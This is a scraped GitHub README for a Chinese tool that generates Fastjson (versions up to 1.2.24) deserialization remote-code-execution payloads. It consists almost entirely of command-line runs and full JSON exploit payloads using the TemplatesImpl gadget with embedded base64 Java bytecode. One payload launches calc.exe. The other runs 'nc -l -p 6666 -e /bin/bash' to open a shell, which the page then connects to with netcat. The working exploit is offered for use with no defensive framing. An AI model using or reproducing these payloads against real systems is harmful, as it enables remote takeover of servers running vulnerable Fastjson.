GitHub - iBearcat/Fastjson-Payload: Fastjson 反序列化
2019-09-12 08:37:02 Author: github.com(查看原文) 阅读量:356 收藏

Join GitHub today

GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.

Sign up

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
Fastjson-Payload-Shell.jar Add files via upload Dec 2, 2017
Fastjson-Payload.jar Add files via upload Dec 2, 2017
README.md
payload-shell.gif Add files via upload Dec 2, 2017
payload.gif Add files via upload Dec 2, 2017

命令执行

PS C:\Users\Bearcat\Desktop> java -jar Fastjson-Payload.jar
#####################################################################
#                                                                   #
#                        Fastjson 反序列化 RCE                       #
#                                                                   #
#                          www.secfree.com                          #
#                                                                   #
#####################################################################

[*] Usage: java -jar Fastjson-Payload.jar --use 20170315
         20170315 => {[fastjson <= 1.2.24] [https://github.com/alibaba/fastjson/wiki/security_update_20170315]}

PS C:\Users\Bearcat\Desktop> java -jar Fastjson-Payload.jar --use 20170315

[+] Usage => [fastjson <= 1.2.24]
[+] Generate Payload

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQArAcAAgEAF2NvbS9zZWNmcmVlL3d3dy9QYXlsb2FkBwAEAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEABjxpbml0PgEAAygpVgEABENvZGUKAAMACQwABQAGCgALAA0HAAwBABFqYXZhL2xhbmcvUnVudGltZQwADgAPAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwgAEQEACGNhbGMuZXhlCgALABMMABQAFQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsKABcAGQcAGAEAE2phdmEvaW8vSU9FeGNlcHRpb24MABoABgEAD3ByaW50U3RhY2tUcmFjZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABlMY29tL3NlY2ZyZWUvd3d3L1BheWxvYWQ7AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwAmAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAJcmVhZENsYXNzAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsHADMBABtqYXZhc3Npc3QvTm90Rm91bmRFeGNlcHRpb24HADUBACBqYXZhc3Npc3QvQ2Fubm90Q29tcGlsZUV4Y2VwdGlvbgoANwA5BwA4AQATamF2YXNzaXN0L0NsYXNzUG9vbAwAOgA7AQAKZ2V0RGVmYXVsdAEAFygpTGphdmFzc2lzdC9DbGFzc1Bvb2w7CgA3AD0MAD4APwEAA2dldAEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmFzc2lzdC9DdENsYXNzOwoAQQBDBwBCAQARamF2YXNzaXN0L0N0Q2xhc3MMAEQARQEACnRvQnl0ZWNvZGUBAAQoKVtCCgBHAEkHAEgBABBqYXZhL3V0aWwvQmFzZTY0DABKAEsBAApnZXRFbmNvZGVyAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwoATQBPBwBOAQAYamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyDABQAFEBAA5lbmNvZGVUb1N0cmluZwEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAljbGFzc25hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAAJjcAEAFUxqYXZhc3Npc3QvQ2xhc3NQb29sOwEAAmNjAQATTGphdmFzc2lzdC9DdENsYXNzOwEAAWIBAAJbQgEAB3BheWxvYWQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwcAXQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyCABfAQBVeyJAdHlwZSI6ImNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4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"],"_name":"shit","_tfactory":{},"_outputProperties":{}}

exploit

反弹Shell

C:\Users\Bearcat\Desktop>java -jar Fastjson-Payload-Shell.jar
*********************************************************************
*                                                                   *
*                  Fastjson 反序列化反弹 Shell 脚本                 *
*                                                                   *
*                          www.secfree.com                          *
*                                                                   *
*********************************************************************

[*] Usage: java -jar Fastjson-Payload.jar --use 20170315
         20170315 => {[Fastjson <= 1.2.24] [https://github.com/alibaba/fastjson/wiki/security_update_20170315]}


C:\Users\Bearcat\Desktop>java -jar Fastjson-Payload-Shell.jar --use 20170315

[*] Usage: [Fastjson Version <= 1.2.24]

[+] command: nc -l -p 6666 -e /bin/bash

[*] Generate Payload:


{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQAsAcAAgEAF2NvbS9zZWNmcmVlL3d3dy9QYXlsb2FkBwAEAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEABjxpbml0PgEAAygpVgEABENvZGUKAAMACQwABQAGCgALAA0HAAwBABFqYXZhL2xhbmcvUnVudGltZQwADgAPAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwgAEQEAGm5jIC1sIC1wIDY2NjYgLWUgL2Jpbi9iYXNoCgALABMMABQAFQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsKABcAGQcAGAEAE2phdmEvaW8vSU9FeGNlcHRpb24MABoABgEAD3ByaW50U3RhY2tUcmFjZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABlMY29tL3NlY2ZyZWUvd3d3L1BheWxvYWQ7AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwAmAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAJcmVhZENsYXNzAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsHADMBABtqYXZhc3Npc3QvTm90Rm91bmRFeGNlcHRpb24HADUBACBqYXZhc3Npc3QvQ2Fubm90Q29tcGlsZUV4Y2VwdGlvbgoANwA5BwA4AQATamF2YXNzaXN0L0NsYXNzUG9vbAwAOgA7AQAKZ2V0RGVmYXVsdAEAFygpTGphdmFzc2lzdC9DbGFzc1Bvb2w7CgA3AD0MAD4APwEAA2dldAEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmFzc2lzdC9DdENsYXNzOwoAQQBDBwBCAQARamF2YXNzaXN0L0N0Q2xhc3MMAEQARQEACnRvQnl0ZWNvZGUBAAQoKVtCCgBHAEkHAEgBABBqYXZhL3V0aWwvQmFzZTY0DABKAEsBAApnZXRFbmNvZGVyAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwoATQBPBwBOAQAYamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyDABQAFEBAA5lbmNvZGVUb1N0cmluZwEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAljbGFzc25hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAAJjcAEAFUxqYXZhc3Npc3QvQ2xhc3NQb29sOwEAAmNjAQATTGphdmFzc2lzdC9DdENsYXNzOwEAAWIBAAJbQgEAB3BheWxvYWQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwcAXQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyCABfAQBVeyJAdHlwZSI6ImNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwiLCJfYnl0ZWNvZGVzIjpbIgoAXABhDAAFAGIBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYIAGQBABdjb20uc2VjZnJlZS53d3cuUGF5bG9hZAoAAQBmDAAwADEKAFwAaAwAaQBqAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7CABsAQADIl0sCABuAQAPIl9uYW1lIjoic2hpdCIsCABwAQAPIl90ZmFjdG9yeSI6e30sCAByAQAWIl9vdXRwdXRQcm9wZXJ0aWVzIjp7fQgAdAEAAX0KAFwAdgwAdwBbAQAIdG9TdHJpbmcBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgkAewB9BwB8AQAQamF2YS9sYW5nL1N5c3RlbQwAfgB/AQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07CACBAQBFKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgCDAIUHAIQBABNqYXZhL2lvL1ByaW50U3RyZWFtDACGAGIBAAdwcmludGxuCACIAQBFKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqCACKAQBNKiAgICAgICAgICAgICAgICAgIEZhc3Rqc29uIOWPjeW6j+WIl+WMluWPjeW8uSBTaGVsbCDohJrmnKwgICAgICAgICAgICAgICAgICoIAIwBAEUqICAgICAgICAgICAgICAgICAgICAgICAgICB3d3cuc2VjZnJlZS5jb20gICAgICAgICAgICAgICAgICAgICAgICAgICoIAI4BAEYqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKCACQAQA5WypdIFVzYWdlOiBqYXZhIC1qYXIgRmFzdGpzb24tUGF5bG9hZC5qYXIgLS11c2UgMjAxNzAzMTUgCACSAQBpCSAyMDE3MDMxNSA9PiB7W0Zhc3Rqc29uIDw9IDEuMi4yNF0gW2h0dHBzOi8vZ2l0aHViLmNvbS9hbGliYWJhL2Zhc3Rqc29uL3dpa2kvc2VjdXJpdHlfdXBkYXRlXzIwMTcwMzE1XX0KCACUAQAIMjAxNzAzMTUKAJYAmAcAlwEAEGphdmEvbGFuZy9TdHJpbmcMAJkAmgEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWggAnAEAKQpbKl0gVXNhZ2U6IFtGYXN0anNvbiBWZXJzaW9uIDw9IDEuMi4yNF0KCACeAQAoWytdIGNvbW1hbmQ6IG5jIC1sIC1wIDY2NjYgLWUgL2Jpbi9iYXNoCggAoAEAGFsqXSBHZW5lcmF0ZSBQYXlsb2FkOgoKCgoAAQCiDABaAFsIAKQBAAIKCggApgEAGlsrXSBTaGVsbDogbmMgYXR0YWNrIDY2NjYKCgCDAKgMAKkAYgEABXByaW50AQAEYXJncwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAApTb3VyY2VGaWxlAQAMUGF5bG9hZC5qYXZhAQAMSW5uZXJDbGFzc2VzAQAHRW5jb2RlcgAhAAEAAwAAAAAABgABAAUABgABAAcAAAB4AAIAAgAAABYqtwAIuAAKEhC2ABJXpwAITCu2ABaxAAEABAANABAAFwADABsAAAAWAAUAAAAcAAQAHgANAB8AEQAgABUAIgAcAAAAFgACAAAAFgAdAB4AAAARAAQAHwAgAAEAIQAAABAAAv8AEAABBwABAAEHABcEAAEAIgAjAAIAJAAAAAQAAQAlAAcAAAA/AAAAAwAAAAGxAAAAAgAbAAAABgABAAAAJAAcAAAAIAADAAAAAQAdAB4AAAAAAAEAJwAoAAEAAAABACkAKgACAAEAIgArAAIAJAAAAAQAAQAlAAcAAABJAAAABAAAAAGxAAAAAgAbAAAABgABAAAAJwAcAAAAKgAEAAAAAQAdAB4AAAAAAAEAJwAoAAEAAAABACwALQACAAAAAQAuAC8AAwAJADAAMQACACQAAAAIAAMAFwAyADQABwAAAGsAAgAEAAAAF7gANkwrKrYAPE0stgBATrgARi22AEywAAAAAgAbAAAAEgAEAAAAKgAEACsACgAsAA8ALQAcAAAAKgAEAAAAFwBSAFMAAAAEABMAVABVAAEACgANAFYAVwACAA8ACABYAFkAAwAJAFoAWwACACQAAAAIAAMAFwAyADQABwAAAGYAAwAAAAAALrsAXFkSXrcAYBJjuABltgBnEmu2AGcSbbYAZxJvtgBnEnG2AGcSc7YAZ7YAdbAAAAACABsAAAAeAAcAAAAxAAkAMwAWADQAGwA1ACAANgAlADcAKgAxABwAAAACAAAACQB4AHkAAgAkAAAACAADABcAMgA0AAcAAAEDAAQAAQAAAJEqvp0ATrIAehKAtgCCsgB6Eoe2AIKyAHoSibYAgrIAehKHtgCCsgB6Eou2AIKyAHoSh7YAgrIAehKNtgCCsgB6Eo+2AIKyAHoSkbYAgqcAQxKTKgQytgCVmQA4sgB6Epu2AIKyAHoSnbYAgrIAersAXFkSn7cAYLgAobYAZxKjtgBntgB1tgCCsgB6EqW2AKexAAAAAwAbAAAAQgAQAAAAOwAFADwADQA9ABUAPgAdAD8AJQBAAC0AQQA1AEIAPQBDAEUARABNAEUAWwBGAGMARwBrAEgAiABJAJAATwAcAAAADAABAAAAkQCqAKsAAAAhAAAABgAC+wBQPwACAKwAAAACAK0ArgAAAAoAAQBNAEcArwAJ"],"_name":"shit","_tfactory":{},"_outputProperties":{}}


[+] Shell: nc attack 6666

exploit


文章来源: https://github.com/iBearcat/Fastjson-Payload
如有侵权请联系:admin#unsafe.sh